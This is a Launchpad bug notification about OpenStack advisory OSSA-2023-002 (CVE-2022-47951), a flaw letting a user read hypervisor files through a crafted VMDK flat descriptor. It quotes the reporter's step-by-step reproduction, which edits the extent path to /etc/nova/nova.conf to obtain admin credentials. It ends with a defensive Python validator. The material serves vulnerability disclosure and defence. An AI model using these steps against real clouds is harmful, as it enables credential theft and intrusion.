Reviewed:  https://review.opendev.org/c/openstack/ossa/+/871635
Committed: https://opendev.org/openstack/ossa/commit/07833d0dcd6f0745a7a487f55d5a23ff76d4c202
Submitter: "Zuul (22348)"
Branch:    master

commit 07833d0dcd6f0745a7a487f55d5a23ff76d4c202
Author: Jeremy Stanley <[email protected]>
Date:   Tue Jan 24 15:11:10 2023 +0000

    Add OSSA-2023-002 (CVE-2022-47951)

    Change-Id: If071ca13337d87f24bbbdec24cbecb826165f4f4
    Closes-Bug: #1996188

** Changed in: ossa
       Status: Fix Committed => Fix Released

--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1996188

Title:
  [OSSA-2023-002] Arbitrary file access through custom VMDK flat
  descriptor (CVE-2022-47951)

Status in Cinder:
  In Progress
Status in Glance:
  In Progress
Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  The vulnerability managers received the following report from
  Sébastien Meriot with OVH via encrypted E-mail:

  Our OpenStack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
  After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

  Here are the details:
  By using a VMDK file, you can dump any file on the hypervisor.

  1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
  2. Edit the leak.vmdk and change the name this way:
       RW 2048 FLAT "leak-flat.vmdk" 0
       --> RW 2048 FLAT "/etc/nova/nova.conf" 0
  3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
  4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
  5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
  6. Download the image: openstack image save --file leak-instance-image leak-instance-image
  7. You get access to the nova.conf file content and you can get access to the OpenStack admin creds.

  We are working on a fix and would be happy to share it with you if needed.
  We think it does affect Nova but it could affect Glance as well. We're not sure yet.

  [postscript per Arnaud Morin (amorin) in IRC]
  cinder seems also affected

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1996188/+subscriptions

--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to     : [email protected]
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp
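
A defensive check for the descriptor edit shown in step 2 of the report, as an added example (not code from the reporter or from the OpenStack projects): it parses a text VMDK descriptor and flags any extent line whose file reference is not a bare sibling filename. The function names, the bare-filename policy and the sample descriptor header are assumptions made for illustration.

```python
import re

# VMDK descriptor extent line: <access> <sectors> <type> "<file>" [offset]
EXTENT_RE = re.compile(
    r'^\s*(RW|RDONLY|NOACCESS)\s+(\d+)\s+([A-Z0-9]+)\s+"([^"]*)"(?:\s+(\d+))?\s*$'
)


def extent_files(descriptor: str):
    """Return (extent_type, filename) for each extent line that names a file."""
    found = []
    for line in descriptor.splitlines():
        m = EXTENT_RE.match(line)
        if m:
            found.append((m.group(3), m.group(4)))
    return found


def is_bare_filename(name: str) -> bool:
    """Assumed policy: an extent may only name a sibling file, never a path."""
    return (
        name not in ("", ".", "..")
        and "/" not in name
        and "\\" not in name
        and "\x00" not in name
    )


def unsafe_extents(descriptor: str):
    """List extent filenames that point outside the image's own directory."""
    return [n for _type, n in extent_files(descriptor) if not is_bare_filename(n)]


# Constructed descriptors built around the two extent lines quoted in the report.
HEADER = ('# Disk DescriptorFile\nversion=1\n'
          'createType="monolithicFlat"\n\n# Extent description\n')
ORIGINAL = HEADER + 'RW 2048 FLAT "leak-flat.vmdk" 0\n'
EDITED = HEADER + 'RW 2048 FLAT "/etc/nova/nova.conf" 0\n'

if __name__ == "__main__":
    for label, text in (("original", ORIGINAL), ("edited", EDITED)):
        bad = unsafe_extents(text)
        print(label, "REJECT " + repr(bad) if bad else "ok")
```

This only covers descriptors stored as plain text; formats that embed the descriptor inside a binary container need it extracted first.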

